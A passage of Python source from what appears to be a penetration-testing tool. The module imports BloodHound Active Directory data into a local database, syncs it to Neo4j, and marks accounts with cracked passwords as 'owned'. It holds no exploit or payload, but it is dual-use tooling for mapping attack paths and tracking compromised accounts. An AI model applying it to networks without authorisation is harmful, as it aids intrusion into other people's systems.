        def _set_owned(tx: Transaction, source_filter_type: str, source_label: str, source: str, owned: bool = True):
            query = 'UNWIND $props AS prop MATCH (n:Base {{{0}: prop.objectid}}) SET n:{1} SET n += prop.map RETURN n.name as name, n.owned as owned LIMIT 1'
            #query = 'UNWIND $props AS prop MERGE (n:Base {{{0}: prop.source}}) ON MATCH SET n:{1} ON CREATE SET n:{1} SET n += prop.map RETURN n.name as name, n.owned as owned LIMIT 1'
            #query = "UNWIND $props AS prop MATCH (n:{1} {{0}: prop.source}) SET n += prop.map RETURN n.name as name, n.owned as owned LIMIT 1"\
            query = query.format(source_filter_type, source_label)
            result = tx.run(query,
                            props=dict(objectid=source.upper(), map=dict(owned=owned))
                            )
            rst = result.single()
            if rst is None:
                return None

            ret_data = {
                'name': rst.get("name", None),
                'owned': rst.get("owned", None),
            }
            return ret_data

        def set_schema(self):
            """Adds bloodhound schema to neo4j

            Arguments:
                tx {neo4j.Transaction} -- Neo4j transaction.
            """
            luceneIndexProvider = "lucene+native-3.0"
            labels = ["User", "Group", "Computer", "GPO", "OU", "Domain", "Container", "Base",
                      "AZBase", "AZApp", "AZDevice", "AZGroup", "AZKeyVault", "AZResourceGroup",
                      "AZServicePrincipal", "AZTenant", "AZUser", "AZVM"]
            azLabels = ["AZBase", "AZApp", "AZDevice", "AZGroup", "AZKeyVault", "AZResourceGroup",
                        "AZServicePrincipal", "AZTenant", "AZUser", "AZVM"]
            schema = {}
            for label in labels:
                schema[label] = dict(
                    name=label,
                    indexes=[dict(
                        name="{}_{}_index".format(label.lower(), "name"),
                        provider=luceneIndexProvider,
                        property="name"
                    )],
                    constraints=[dict(
                        name="{}_{}_constraint".format(label.lower(), "objectid"),
                        provider=luceneIndexProvider,
                        property="objectid"
                    )],
                )

            for label in azLabels:
                schema[label]["indexes"].append({
                    'name': "{}_{}_index".format(label.lower(), "azname"),
                    'provider': luceneIndexProvider,
                    'property': "azname"
                })

            for label in labels:
                for constraint in schema[label]['constraints']:

                    try:
                        if self.version.major >= 5:
                            query = f"CREATE CONSTRAINT {constraint['name']} IF NOT EXISTS FOR (b:{label}) REQUIRE b.{constraint['property']} IS UNIQUE"

                            with self.driver.session(database=self.database) as session:
                                session.execute_write(self.execute, query)

                        else:
                            query = f"CREATE CONSTRAINT {constraint['name']} IF NOT EXISTS ON (b:{label}) ASSERT b.{constraint['property']} IS UNIQUE"

                            with self.driver.session(database=self.database) as session:
                                session.write_transaction(self.execute, query)

                    except Exception as e:
                        #print(e)
                        pass

                for index in schema[label]['indexes']:
                    props = dict(
                        name=index['name'],
                        label=[label],
                        properties=[index['property']],
                        provider=index['provider']
                    )
                    try:
                        if self.version.major >= 5:
                            query = f"CREATE INDEX {index['name']} IF NOT EXISTS FOR (b:{label}) ON (b.{index['property']})"

                            with self.driver.session(database=self.database) as session:
                                session.execute_write(self.execute, query, **props)
                        else:
                            query = "CALL db.createIndex($name, $label, $properties, $provider)"

                            with self.driver.session(database=self.database) as session:
                                session.write_transaction(self.execute, query)

                        #print(query)

                    except Exception as e:
                        #print(e)
                        pass

        def get_version(self) -> list:
            try:
                with self.driver.session(database=self.database) as session:
                    return session.execute_read(self._get_version)
            except:
                with self.driver.session(database=self.database) as session:
                    return session.read_transaction(self._get_version)

        @staticmethod
        def _get_version(tx: Transaction):
            result = tx.run(
                "call dbms.components() yield name, versions, edition unwind versions as version return name, version, edition;",
                )
            rst = result.single()
            if rst is None:
                return None

            return Bloodhound.BloodHoundVersion(
                name=rst.get("name", None),
                version=rst.get("version", '0.0.0'),
                edition=rst.get("edition", None)
            )

    def __init__(self):
        super().__init__('bloodhound', 'Import BloodHound files')

    def add_flags(self, flags: _ArgumentGroup):
        flags.add_argument('-T',
                           action='store',
                           metavar='[tasks]',
                           type=int,
                           default=6,
                           dest=f'tasks',
                           help=Color.s('number of connects in parallel (per host, default: 6)'))

        flags.add_argument('--enable-group-chain',
                           action='store_true',
                           default=False,
                           dest=f'chain_enabled',
                           help=Color.s('Enable group chain calculation.'))

        flags.add_argument('-u',
                           action='store',
                           metavar='[neo4j username]',
                           type=str,
                           default='neo4j',
                           dest=f'neo4j_username',
                           help=Color.s('Neo4j Username to mark host/users as owned. (default: neo4j)'))

        flags.add_argument('-p',
                           action='store',
                           metavar='[neo4j password]',
                           type=str,
                           default='neo4j',
                           dest=f'neo4j_password',
                           help=Color.s('Neo4j Password to mark host/users as owned. (default: neo4j)'))

        flags.add_argument('-d',
                           action='store',
                           metavar='[neo4j database]',
                           type=str,
                           default='neo4j',
                           dest=f'neo4j_database',
                           help=Color.s('Neo4j Database to mark host/users as owned. (default: neo4j)'))

    def add_commands(self, cmds: _ArgumentGroup):
        cmds.add_argument('--import-data',
                          action='store',
                          metavar='[bloodhound file]',
                          type=str,
                          dest=f'bhfile',
                          help=Color.s('BloodHound file. Available parses: {G}.zip{W} and {G}.json{W}'))

        cmds.add_argument('--mark-owned',
                          action='store',
                          metavar='[neo4j host and port]',
                          type=str,
                          dest=f'neo4j_host',
                          help=Color.s('BloodHound Neo4j Database. host:port'))

        cmds.add_argument('--sync-to',
                          action='store',
                          metavar='[neo4j host and port]',
                          type=str,
                          dest=f'neo4j_host2',
                          help=Color.s('BloodHound Neo4j Database. host:port'))

    def load_from_arguments(self, args: Namespace) -> bool:
        if (args.neo4j_host is not None and args.neo4j_host != '') or \
                (args.neo4j_host2 is not None and args.neo4j_host2 != ''):

            host = args.neo4j_host
            self.mode = Bloodhound.ImportMode.MarkOwned

            if args.neo4j_host2 is not None and args.neo4j_host2 != '':
                self.mode = Bloodhound.ImportMode.Sync
                host = args.neo4j_host2

            port = 7687
            if ':' in host:
                (host, port) = host.split(':', 2)

            try:
                self.bh_connection = Bloodhound.BloodHoundConnection(
                    f'bolt://{host}:{port}',
                    args.neo4j_username,
                    args.neo4j_password,
                    args.neo4j_database,
                )

            except Exception as e:
                Logger.pl('{!} {R}error: Fail to connect with Neo4j Database: {O}%s{R} {W}\r\n' % (
                    e))
                Tools.exit_gracefully(1)

            #try:
            #    self.bh_connection.add_constraints()
            #except ClientError:
            #    pass
            #except Exception as e:
            #    Logger.pl('{!} {R}error: Fail adding BloodHound constraints Neo4j Database: {O}%s{R} {W}\r\n' % (
            #        e))
            #    Tools.exit_gracefully(1)

        elif args.bhfile is not None and args.bhfile.strip() != '':

            if not os.path.isfile(args.bhfile):
                Logger.pl('{!} {R}error: BloodHound filename is invalid {O}%s{R} {W}\r\n' % (
                    args.bhfile))
                Tools.exit_gracefully(1)

            try:
                with open(args.bhfile, 'r') as f:
                    # file opened for writing. write to it here
                    pass
            except IOError as x:
                if x.errno == errno.EACCES:
                    Logger.pl('{!} {R}error: could not open BloodHound file {O}permission denied{R}{W}\r\n')
                    Tools.exit_gracefully(1)
                elif x.errno == errno.EISDIR:
                    Logger.pl('{!} {R}error: could not open BloodHound file {O}it is an directory{R}{W}\r\n')
                    Tools.exit_gracefully(1)
                else:
                    Logger.pl('{!} {R}error: could not open BloodHound file {W}\r\n')
                    Tools.exit_gracefully(1)

            self.filename = args.bhfile
            self.chain_enabled = args.chain_enabled
            self.mode = Bloodhound.ImportMode.Import

        if self.mode == Bloodhound.ImportMode.Undefined:
            Logger.pl('{!} {R}error: Nor {O}--import-data{R} or {O}--mark-owned{R} was provided{W}\r\n')
            Tools.exit_gracefully(1)

        if args.tasks >= 1:
            self.tasks = int(args.tasks)

        self.db = self.open_db(args)

        Logger.pl('     {C}operational mode:{O} %s{W}' % self.mode)

        return True

    def thread_start_callback(self, index, **kwargs):
        return self.bh_connection.get_session()

    def bh_callback1(self, entry, thread_callback_data, **kwargs):
        #print(entry, thread_callback_data)

        #https://github.com/BloodHoundAD/BloodHound/blob/master/src/js/newingestion.js

        #query = 'UNWIND $props AS prop MERGE (n:Base {{{0}: prop.source}}) ON MATCH SET n:{1} ON CREATE SET n:{1} SET n += prop.map'
        query = 'UNWIND $props AS prop MERGE (n:Base {{{0}:prop.objectid}}) SET n:{1} SET n += prop.map'
        query = query.format(entry['filter_type'], entry['object_label'])

        props = dict(
            props=dict(
                map=json.loads(entry['props']),
                objectid=entry['object_id'].upper()
            )
        )

        thread_callback_data.write_transaction(
            Bloodhound.BloodHoundConnection.execute,
            query,
            **props)

        self.synced.append(str(entry['object_id']))

    def bh_callback2(self, entry, thread_callback_data, **kwargs):


        #https://github.com/BloodHoundAD/BloodHound/blob/master/src/js/newingestion.js


        # Merge source and target object too
        #insert_query = 'UNWIND $props AS prop MERGE (n:Base {{{0}: prop.source}}) ON MATCH SET n:{1} ON CREATE SET n:{1} MERGE (m:Base {{objectid: prop.target}}) ON MATCH SET m:{2} ON CREATE SET m:{2} MERGE (n)-[r:{3} {4}]->(m)'
        insert_query = 'UNWIND $props AS prop MERGE (n:Base {{{0}: prop.source}}) SET n:{1} MERGE (m:Base {{objectid: prop.target}}) SET m:{2} MERGE (n)-[r:{3} {4}]->(m)'

        # Merge only the relationship from source and target
        #insert_query = 'UNWIND $props AS prop MATCH (n:Base {{{0}: prop.source}}) MATCH (m:Base {{objectid: prop.target}}) MERGE (n)-[r:{3} {4}]->(m)'

        #Replace all tags
        insert_query = insert_query.format(entry['source_filter_type'],
                                           entry['source_label'],
                                           entry['target_label'],
                                           entry['edge_type'],
                                           entry['edge_props'])

        props = dict(
            props=json.loads(entry['props']),
        )

        #print(insert_query)
        thread_callback_data.write_transaction(
            Bloodhound.BloodHoundConnection.execute,
            insert_query,
            **props)

        self.synced.append(str(entry['edge_id']))

    def status(self, text, sync, total):
        with progress.Bar(label=" %s " % text, expected_size=total) as bar:
            try:
                while sync.running:
                    ex = sync.executed
                    if ex > total:
                        bar.expected_size = ex
                    bar.show(ex)
                    time.sleep(0.3)
            except KeyboardInterrupt as e:
                raise e
            except:
                pass
            finally:
                bar.hide = True
                Tools.clear_line()
                sync.close()

        return

    def mark_owned(self):
        Color.pl('{?} {W}{D}Syncing owned objects...{W}')

        db_cracked = self.db.select_raw(
            sql='select c.name, d.name as domain_name, c.type, c.object_identifier from credentials as c '
                'inner join passwords as p '
                'on c.password_id  = p.password_id  '
                'inner join domains as d '
                'on c.domain_id = d.domain_id  '
                'where p.length > 0',
            args=[]
        )

        if len(db_cracked) > 0:
            with progress.Bar(label=" Marking as owned ", expected_size=len(db_cracked)) as bar:
                try:
                    for idx, row in enumerate(db_cracked):
                        bar.show(idx)

                        label = "Computer" if row['type'] == "M" else "User"
                        if row['object_identifier'] is not None and row['object_identifier'].strip() != '':
                            filter_type = "objectid"
                            source = row['object_identifier']
                        else:
                            filter_type = "name"
                            source = f'{row["name"]}@{row["domain_name"]}'.upper()
                            if row['type'] == "M":
                                source = f'{row["name"]}.{row["domain_name"]}'.upper()

                        self.bh_connection.set_owned(
                            source_filter_type=filter_type,
                            source_label=label,
                            source=source,
                            owned=True
                        )

                    # print(self.bh_connection.get_all_owned())

                except KeyboardInterrupt as e:
                    raise e
                finally:
                    bar.hide = True
                    Tools.clear_line()

    def run(self):

        # Disable warning logs of neo4j driver
        logging.getLogger().setLevel(logging.DEBUG)

        if self.mode == Bloodhound.ImportMode.MarkOwned:
            try:
                Color.pl('{?} {W}{D}Setting neo4j bloodhound schema...{W}')
                self.bh_connection.set_schema()
            except ClientError:
                pass
            except Exception as e:
                Logger.pl('{!} {R}error: Fail adding BloodHound schema Neo4j Database: {O}%s{R} {W}\r\n' % (
                    e))
                Tools.exit_gracefully(1)

            self.mark_owned()

        elif self.mode == Bloodhound.ImportMode.Sync:
            try:
                Color.pl('{?} {W}{D}Setting neo4j bloodhound schema...{W}')
                self.bh_connection.set_schema()
            except ClientError:
                pass
            except Exception as e:
                Logger.pl('{!} {R}error: Fail adding BloodHound schema Neo4j Database: {O}%s{R} {W}\r\n' % (
                    e))
                Tools.exit_gracefully(1)

            Color.pl('{?} {W}{D}Syncing objects...{W}')

            db_sync_count = self.db.select_raw(
                sql='select count(*) as qty from bloodhound_objects '
                    'where sync_date <= updated_date',
                args=[]
            )
            total = int(db_sync_count[0]['qty'])

            if total > 0:
                if total > 10000:
                    Color.pl('{?} {W}{D}this could take a while so go grab a redbull...{W}')

                with BloodhoundSync(callback=self.bh_callback1, per_thread_callback=self.thread_start_callback, threads=self.tasks) as t:
                    t.start()

                    t1 = threading.Thread(target=self.status, kwargs=dict(sync=t, total=total, text="Syncing objects (step 1/4)"))
                    t1.daemon = True
                    t1.start()

                    try:

                        while True:
                            for idx, row in enumerate(self.synced):
                                self.db.update(
                                    'bloodhound_objects',
                                    filter_data={'object_id': row},
                                    updated_date=datetime.datetime.now() - datetime.timedelta(seconds=60),
                                    sync_date=datetime.datetime.now()
                                )
                            self.synced = []

                            while t.count > 1000:
                                time.sleep(0.3)

                            db_sync = self.db.select_raw(
                                sql='select * from bloodhound_objects '
                                    'where sync_date <= updated_date '
                                    'order by updated_date ASC '
                                    'limit 10000',
                                args=[]
                            )

                            if len(db_sync) == 0:
                                break

                            for idx, row in enumerate(db_sync):
                                t.add_item(row['object_id'], row)

                            # clear control
                            t.inserted = [row['object_id'] for idx, row in enumerate(db_sync)]

                        while t.executed < 1 and t.count > 0:
                            time.sleep(0.3)

                        while t.running and t.count > 0:
                            time.sleep(0.300)

                    except KeyboardInterrupt as e:
                        raise e
                    finally:
                        t.close()
                        Tools.clear_line()
                        Color.pl('{?} {W}{D}Updating synced objects, wait a few seconds...{W}')

                        with progress.Bar(label=" Updating synced objects (step 2/4) ", expected_size=len(self.synced)) as bar:
                            try:
                                for idx, row in enumerate(self.synced):
                                    bar.show(idx)

                                    self.db.update(
                                        'bloodhound_objects',
                                        filter_data={'object_id': row},
                                        updated_date=datetime.datetime.now() - datetime.timedelta(seconds=60),
                                        sync_date=datetime.datetime.now()
                                    )

                            except KeyboardInterrupt as e:
                                raise e
                            finally:
                                bar.hide = True
                                Tools.clear_line()

            self.synced = []

            Color.pl('{?} {W}{D}Syncing edges...{W}')

            db_sync_count = self.db.select_raw(
                    sql='select count(*) as qty from bloodhound_edge '
                        'where sync_date <= updated_date',
                    args=[]
                )
            total = int(db_sync_count[0]['qty'])
            if total > 0:
                if total > 10000:
                    Color.pl('{?} {W}{D}this could take a while so go grab 2 more redbulls...{W}')
                elif total > 5000:
                    Color.pl('{?} {W}{D}this could take a while so go grab a redbull...{W}')

                with BloodhoundSync(callback=self.bh_callback2, per_thread_callback=self.thread_start_callback, threads=self.tasks) as t:
                    t.start()

                    t1 = threading.Thread(target=self.status, kwargs=dict(sync=t, total=total, text="Syncing edges (step 3/4)"))
                    t1.daemon = True
                    t1.start()

                    try:
                        while True:
                            for idx, row in enumerate(self.synced):
                                self.db.update(
                                    'bloodhound_edge',
                                    filter_data={'edge_id': row},
                                    updated_date=datetime.datetime.now() - datetime.timedelta(seconds=60),
                                    sync_date=datetime.datetime.now()
                                )
                            self.synced = []

                            while t.count > 3000:
                                time.sleep(0.3)

                            db_sync = self.db.select_raw(
                                sql='select * from bloodhound_edge '
                                    'where sync_date <= updated_date '
                                    'order by updated_date ASC '
                                    'limit 10000',
                                args=[]
                            )

                            if len(db_sync) == 0:
                                break

                            for idx, row in enumerate(db_sync):
                                t.add_item(row['edge_id'], row)

                            # clear control
                            t.inserted = [row['edge_id'] for idx, row in enumerate(db_sync)]

                        while t.executed < 1 and t.count > 0:
                            time.sleep(0.3)

                        while t.running and t.count > 0:
                            time.sleep(0.300)

                    except KeyboardInterrupt as e:
                        raise e
                    finally:
                        t.close()
                        Tools.clear_line()
                        Color.pl('{?} {W}{D}Updating synced objects, wait a few seconds...{W}')

                        with progress.Bar(label=" Updating synced objects (step 4/4) ", expected_size=len(self.synced)) as bar:
                            try:
                                for idx, row in enumerate(self.synced):
                                    bar.show(idx)

                                    self.db.update(
                                        'bloodhound_edge',
                                        filter_data={'edge_id': row},
                                        updated_date=datetime.datetime.now() - datetime.timedelta(seconds=60),
                                        sync_date=datetime.datetime.now()
                                    )

                            except KeyboardInterrupt as e:
                                raise e
                            finally:
                                bar.hide = True
                                Tools.clear_line()

            #Mark owned objects
            self.mark_owned()

        elif self.mode == Bloodhound.ImportMode.Import:
            start_date = datetime.datetime.now()
            try:
                # Check file type
                mime = mimetypes.MimeTypes().guess_type(self.filename)[0]
                if mime == "application/zip":
                    # extract files
                    Color.pl('{?} {W}{D}BloodHound ZIP File identified, extracting...{W}')

                    with self.get_temp_directory() as tmpdirname:
                        try:
                            with ZipFile(self.filename, 'r') as zObject:
                                zObject.extractall(tmpdirname)

                            Color.pl('{?} {W}{D}checking file consistency...{W}')
                            t_files = [
                                f for f in self.get_files(tmpdirname)
                                if f is not None or f.strip() != ''
                            ]
                            files = []
                            with progress.Bar(label=" Parsing ", expected_size=len(t_files)) as bar:
                                try:
                                    for idx, f in enumerate(t_files):
                                        bar.show(idx)
                                        f1 = Bloodhound.BloodhoundFile(f)
                                        if f1.type != 'unknown':
                                            files.append(f1)
                                        else:
                                            Color.pl('{?} {W}{D}invalid file: {G}%s{W}' % f)

                                except KeyboardInterrupt as e:
                                    raise e
                                finally:
                                    bar.hide = True
                                    Tools.clear_line()

                            Color.pl('{?} {W}{O}%s{G} valid files in ZIP{W}' % len(files))

                            self.parse_files(files)

                        finally:
                            shutil.rmtree(tmpdirname)
                else:
                    f = Bloodhound.BloodhoundFile(self.filename)
                    if f.type == 'unknown':
                        Logger.pl('{!} {R}error: BloodHound file is invalid {O}%s{R} {W}\r\n' % (
                            f.file_name))
                        Tools.exit_gracefully(1)
                    self.parse_files([f])

            except KeyboardInterrupt as e:
                Tools.clear_line()
                print((" " * 180), end='\r', flush=True)
                print('')
                Logger.pl("{!} {C}Interrupted by user{W}")
                raise e
            finally:
                imported = self.db.select_raw(
                    sql='select row_number() OVER (ORDER BY o.object_label ASC) AS __line, o.object_label as Type, '
                        'sum(CASE WHEN o.insert_date >= ? THEN 1 ELSE 0 END) as Inserted, '
                        'sum(CASE WHEN o.insert_date < ? THEN 1 ELSE 0 END) as Updated '
                        'from bloodhound_objects as o '
                        'where o.updated_date >= ? '
                        'group by o.object_label '
                        'order by o.object_label',
                    args=[start_date, start_date, start_date])

                if len(imported) == 0:
                    Color.pl(('{!} {O}Process finished with none data imported. '
                          '{G}Generally it occurs when there are previously imported data in database and '
                          'this data is updated.{W}'))

                    start_date = datetime.date(1970, 1, 1)

                    imported = self.db.select_raw(
                        sql='select row_number() OVER (ORDER BY o.object_label ASC) AS __line, o.object_label as Type, '
                            'sum(CASE WHEN o.insert_date >= ? THEN 1 ELSE 0 END) as Inserted, '
                            'sum(CASE WHEN o.insert_date < ? THEN 1 ELSE 0 END) as Updated '
                            'from bloodhound_objects as o '
                            'where o.updated_date >= ? '
                            'group by o.object_label '
                            'order by o.object_label',
                        args=[start_date, start_date, start_date])

                Color.pl('{+} {W}Imported objects{W}')
                Color.pl('{W}{D}%s{W}' % Tools.get_tabulated(imported))


    def parse_files(self, files):

        unsupported = [
            f for f in files
            if f.version != 4 and f.version != 5
        ]
        if len(unsupported) > 0:
            Logger.pl('{!} {R}error: Unsupported BloodHound Version:{W}')
            for f in unsupported:
                Color.pl('{!} {W}{D}%s: {G}v%d{W}' % (f.file_name, f.version))
            Tools.exit_gracefully(1)

        self.groups = {}

        # Domains
        self.parse_domains_files(sorted([
            f for f in files
            if f.type == 'domains'
        ], key=lambda x: (x.order, x.file_name), reverse=False))

        # GPO
        self.parse_gpo_files(sorted([
            f for f in files
            if f.type == 'gpos'
        ], key=lambda x: (x.order, x.file_name), reverse=False))

        # OU
        self.parse_ou_files(sorted([
            f for f in files
            if f.type == 'ous'
        ], key=lambda x: (x.order, x.file_name), reverse=False))

        # Groups
        self.parse_groups_file(sorted([
            f for f in files
            if f.type == 'groups'
        ], key=lambda x: (x.order, x.file_name), reverse=False))

        # Computers
        self.parse_computers_files(sorted([
            f for f in files
            if f.type == 'computers'
        ], key=lambda x: (x.order, x.file_name), reverse=False))

        # Users
        self.parse_users_file(sorted([
            f for f in files
            if f.type == 'users'
        ], key=lambda x: (x.order, x.file_name), reverse=False))

    def parse_computers_files(self, files):

        Color.pl('{?} {W}{D}importing computers...{W}')

        total = sum(f.items for f in files)
        with progress.Bar(label=" Processing ", expected_size=total) as bar:
            try:
                count = 0
                for file in files:
                    data = file.get_json().get('data', [])
                    for idx, computer in enumerate(data):
                        count += 1
                        bar.show(count)

                        oid = computer.get('ObjectIdentifier', None)
                        properties = computer.get('Properties', None)

                        if oid is None or properties is None:
                            raise Exception('Unable to parse domain data')

                        self.db.insert_or_update_bloodhound_object(
                            label='Computer',
                            object_id=oid,
                            filter_type='objectid',
                            source=oid,
                            **properties
                        )

                        name = properties.get('name', None)
                        domain = properties.get('domain', None)
                        dn = properties.get('distinguishedname', None)

                        if name is None or domain is None or dn is None:
                            raise Exception('Unable to parse domain data')

                        name = name.lower()
                        domain = domain.lower()

                        if name.endswith(f'.{domain}'):
                            name = name.replace(f'.{domain}', '')

                        domain_id = self.get_domain(properties)

                        if (gid := Tools.get_dict_value(computer, 'PrimaryGroupSID')) is not None:
                            if gid not in self.groups:
                                self.groups[gid] = {"members": []}
                            self.groups[gid]['members'].append(oid)

                            self.db.insert_or_update_bloodhound_edge(
                                source=oid,
                                target=gid,
                                source_label='Computer',
                                target_label='Group',
                                edge_type='MemberOf',
                                edge_props='{isacl: false}',
                                filter_type='objectid',
                                props=dict(source=oid, target=gid)
                            )

                        self.db.insert_or_update_credential(
                            domain=domain_id,
                            username=name,
                            groups='',
                            object_identifier=oid,
                            dn=dn,
                            ntlm_hash='',
                            type='M')

                        self.process_options(computer, 'Computer')

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

    def parse_ou_files(self, files):

        Color.pl('{?} {W}{D}importing OU...{W}')

        total = sum(f.items for f in files)
        with progress.Bar(label=" Processing ", expected_size=total) as bar:
            try:
                count = 0
                for file in files:
                    data = file.get_json().get('data', [])
                    for idx, ou in enumerate(data):
                        count += 1
                        bar.show(count)

                        oid = ou.get('ObjectIdentifier', None)
                        properties = ou.get('Properties', None)

                        if oid is None or properties is None:
                            raise Exception('Unable to parse OU data')

                        self.db.insert_or_update_bloodhound_object(
                            label='OU',
                            object_id=oid,
                            filter_type='objectid',
                            source=oid,
                            **properties
                        )

                        if 'Aces' in ou and ou['Aces'] is not None:
                            self.process_ace_list(ou['Aces'], oid, "OU")

                        options = [
                            ('Users', 'User', 'Contains'),
                            ('Computers', 'Computer', 'Contains'),
                            ('ChildOus', 'OU', 'Contains'),
                        ]

                        for option, member_type, edge_name in options:
                            if option in ou and ou[option]:
                                targets = ou[option]
                                for target in targets:
                                    self.db.insert_or_update_bloodhound_edge(
                                        source=oid,
                                        target=target,
                                        source_label='OU',
                                        target_label=member_type,
                                        edge_type=edge_name,
                                        edge_props='{isacl: false}',
                                        filter_type='objectid',
                                        props=dict(source=oid, target=target)
                                    )

                        if 'Links' in ou and ou['Links']:
                            for gpo in ou['Links']:
                                self.db.insert_or_update_bloodhound_edge(
                                    source=oid,
                                    target=gpo['GUID'].upper(),
                                    source_label='GPO',
                                    target_label='OU',
                                    edge_type='GpLink',
                                    edge_props='{isacl: false, enforced: prop.enforced}',
                                    filter_type='objectid',
                                    props=dict(source=oid, target=gpo['GUID'].upper(), enforced=gpo['IsEnforced'])
                                )

                        self.process_options(ou, 'Computer')

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

    def parse_gpo_files(self, files):

        Color.pl('{?} {W}{D}importing GPO...{W}')

        total = sum(f.items for f in files)
        with progress.Bar(label=" Processing ", expected_size=total) as bar:
            try:
                count = 0
                for file in files:
                    data = file.get_json().get('data', [])
                    for idx, gpo in enumerate(data):
                        count += 1
                        bar.show(count)

                        oid = gpo.get('ObjectIdentifier', None)
                        properties = gpo.get('Properties', None)

                        if oid is None or properties is None:
                            raise Exception('Unable to parse GPO data')

                        self.db.insert_or_update_bloodhound_object(
                            label='GPO',
                            object_id=oid,
                            filter_type='objectid',
                            source=oid,
                            **properties
                        )

                        if "Aces" in gpo and gpo["Aces"] is not None:
                            self.process_ace_list(gpo['Aces'], oid, "GPO")

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

    def parse_domains_files(self, files):

        Color.pl('{?} {W}{D}importing domains...{W}')

        total = sum(f.items for f in files)
        with progress.Bar(label=" Processing ", expected_size=total) as bar:
            try:
                count = 0
                for file in files:
                    data = file.get_json().get('data', [])
                    for idx, domain in enumerate(data):
                        count += 1
                        bar.show(count)

                        oid = domain.get('ObjectIdentifier', None)
                        properties = domain.get('Properties', None)

                        if oid is None or properties is None:
                            raise Exception('Unable to parse domain data')

                        name = properties.get('name', None)
                        domain_name = properties.get('domain', None)
                        dn = properties.get('distinguishedname', None)

                        if name is None or domain_name is None or dn is None:
                            raise Exception('Unable to parse domain data')

                        self.db.insert_or_get_domain(
                            domain=domain_name,
                            dn=dn,
                            object_identifier=oid)

                        #BloodHound objects

                        self.db.insert_or_update_bloodhound_object(
                            label='Domain',
                            object_id=oid,
                            filter_type='objectid',
                            source=oid,
                            **properties
                        )

                        if 'Aces' in domain and domain['Aces'] is not None:
                            self.process_ace_list(domain['Aces'], oid, "Domain")

                        trust_map = {0: 'ParentChild', 1: 'CrossLink', 2: 'Forest', 3: 'External', 4: 'Unknown'}
                        if 'Trusts' in domain and domain['Trusts'] is not None:
                            for trust in domain['Trusts']:
                                trust_type = trust['TrustType']
                                direction = trust['TrustDirection']
                                props = {}
                                if direction in [1, 3]:
                                    props = dict(
                                        source=oid,
                                        target=trust['TargetDomainSid'],
                                        trusttype=trust_map[trust_type],
                                        transitive=trust['IsTransitive'],
                                        sidfiltering=trust['SidFilteringEnabled'],
                                    )
                                elif direction in [2, 4]:
                                    props = dict(
                                        target=oid,
                                        source=trust['TargetDomainSid'],
                                        trusttype=trust_map[trust_type],
                                        transitive=trust['IsTransitive'],
                                        sidfiltering=trust['SidFilteringEnabled'],
                                    )
                                else:
                                    Color.pl('{!} {W}{D}Could not determine direction of trust... direction: {O}%s{W}' % direction)
                                    continue

                                self.db.insert_or_update_bloodhound_edge(
                                    source=props['source'],
                                    target=props['target'],
                                    source_label='Domain',
                                    target_label='Domain',
                                    edge_type='TrustedBy',
                                    edge_props='{sidfiltering: prop.sidfiltering, trusttype: prop.trusttype, transitive: prop.transitive, isacl: false}',
                                    filter_type='objectid',
                                    props=props
                                )

                        options = [
                            ('Users', 'User', 'Contains'),
                            ('Computers', 'Computer', 'Contains'),
                            ('ChildOus', 'OU', 'Contains'),
                        ]

                        for option, member_type, edge_name in options:
                            if option in domain and domain[option]:
                                targets = domain[option]
                                for target in targets:
                                    self.db.insert_or_update_bloodhound_edge(
                                        source=oid,
                                        target=target,
                                        source_label='OU',
                                        target_label=member_type,
                                        edge_type=edge_name,
                                        edge_props='{isacl: false}',
                                        filter_type='objectid',
                                        props=dict(source=oid, target=target)
                                    )

                        if 'Links' in domain and domain['Links']:
                            for gpo in domain['Links']:
                                self.db.insert_or_update_bloodhound_edge(
                                    source=oid,
                                    target=gpo['GUID'].upper(),
                                    source_label='GPO',
                                    target_label='OU',
                                    edge_type='GpLink',
                                    edge_props='{isacl: false, enforced: prop.enforced}',
                                    filter_type='objectid',
                                    props=dict(source=oid,
                                           target=gpo['GUID'].upper(),
                                           enforced=gpo['IsEnforced'])
                                )

                        self.process_options(domain, 'Computer')

            except KeyboardInterrupt as e:
                raise e
            finally:
                bar.hide = True
                Tools.clear_line()

    def parse_groups_file(self, files):

        Color.pl('{?} {W}{D}importing groups...{W}')

        total = sum(f.items for f in files)
        with progress.Bar(label=" Importing ", expected_size=total) as bar:
            try:
                count = 0
                for file in files:
                    data = file.get_json().get('data', [])
                    for idx, group in enumerate(data):
                        count += 1
                        bar.show(count)

                        gid = group.get('ObjectIdentifier', None)
                        properties = group.get('Properties', None)

                        if gid is None or properties is None:
                            raise Exception('Unable to parse domain data')

                        if gid not in self.groups:
                            self.groups[gid] = { "members": [] }

                        self.db.insert_or_update_bloodhound_object(
                            label='Group',
                            object_id=gid,
                            filter_type='objectid',
                            source=gid,
                            **properties
                        )

                        if 'Aces' in group and group['Aces'] is not None:
                            self.process_ace_list(group['Aces'], gid, "Group")

                        if (pgsid := Tools.get_dict_value(group, 'PrimaryGroupSID')) is not None:
                            if pgsid not in self.groups:
                                self.groups[pgsid] = {"members": []}
                            self.groups[pgsid]['members'].append(gid)

                            self.db.insert_or_update_bloodhound_edge(
                                source=gid,
                                target=pgsid,
                                source_label='Group',
                                target_label='Group',
                                edge_type='MemberOf',
                                edge_props='{isacl: false}',
                                filter_type='objectid',
                                props=dict(source=gid, target=pgsid)
                            )

                        for entry in Tools.get_dict_value(group, 'AllowedToDelegate', []):
                            self.db.insert_or_update_bloodhound_edge(
                                source=gid,
                                target=entry,
                                source_label='Group',
                                target_label='Computer',
                                edge_type='AllowedToDelegate',
                                edge_props='{isacl: false}',
                                filter_type='objectid',
                                props=dict(source=gid, target=entry)
                            )

                        for member in group['Members']:
                            self.db.insert_or_update_bloodhound_edge(
                                source=member['ObjectIdentifier'],
                                target=gid,
                                source_label=member['ObjectType'],
                                target_label='Group',
                                edge_type='MemberOf',
                                edge_props='{isacl: false}',
                                filter_type='objectid',
                                props=dict(source=member['ObjectIdentifier'], target=gid)
                            )

                            t = group.get('ObjectType', None)
                            oid = group['ObjectIdentifier']
                            if t == "Group":
                                self.groups[gid]['members'].append(oid)

                        name = properties.get('name', '@').split('@')[0]
                        dn = properties.get('distinguishedname', None)

                        domain_id = self.get_domain(properties)

                        self.groups[gid].update(**{
                            "name": name,
                            "domain_id": domain_id,
                            "object_identifier": gid,
                            "dn": dn,
                            "json_members": group.get('Members', []),
                            "members": self.groups.get(gid, []).get("members", []),
